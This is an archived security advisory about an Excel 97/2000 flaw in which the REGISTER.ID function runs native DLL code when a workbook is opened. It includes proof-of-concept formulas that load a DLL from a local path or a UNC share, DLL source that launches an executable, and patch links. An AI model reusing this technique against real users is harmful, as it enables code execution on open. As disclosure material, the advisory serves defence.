COMMAND
Excel
SYSTEMS AFFECTED
Excel 97, 2000
PROBLEM
Following is based on a Georgi Guninski security advisory. Excel
2000/Windows 98 (suppose other versions are also vulnerable, not
tested) allows executing programs when opening an Excel Workbook
(.xls file). This may be also be exploited thru IE or Outlook.
This may lead to taking full control over user's computer.
The problem is the REGISTER.ID Excel function. It allows
executing native code from a DLL - at least the DllMain()
function. Note: this has nothing to do with VBA code - the code
being executed is native code from a DLL. In order the exploit
to work the user must be able to access a specially designed DLL,
residing either on the local disk or on a UNC share.
The code is:
-------dll3.xls--------------------------------------------
=REGISTER.ID("C:\DLL1.DLL";"dllmain";"a")
=REGISTER.ID("\\UNC\SHARE\DLL1.DLL";"dllmain";"a")
-----------------------------------------------------------
-------dll1.cpp--------------------------------------------
BOOL APIENTRY DllMain( HANDLE hModule,
DWORD ul_reason_for_call,
LPVOID lpReserved
)
{
switch( ul_reason_for_call )
{
case DLL_PROCESS_ATTACH:
// Initialize once for each new process.
// Return FALSE to fail DLL load.
// Note: For NT/2000 you may need to move the following code outside the switch()
MessageBox(NULL, "Hello world!", "Info", MB_OK);
MessageBox(NULL, "Shall try to start: C:\\TEST.EXE\n You may need to create it.", "Info", MB_OK);
system("C:\\TEST.EXE");
break;
......
---------------------------------------------------
Demonstration is available at:
http://www.nat.bg/~joro/excel2.html
SOLUTION
Patch availability:
- Microsoft Excel 2000: http://officeupdate.microsoft.com/2000/downloaddetails/xl9p3pkg.htm
- Microsoft Excel 97: http://officeupdate.microsoft.com/downloadDetails/xl8p10pkg.htm
TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2025 AOH
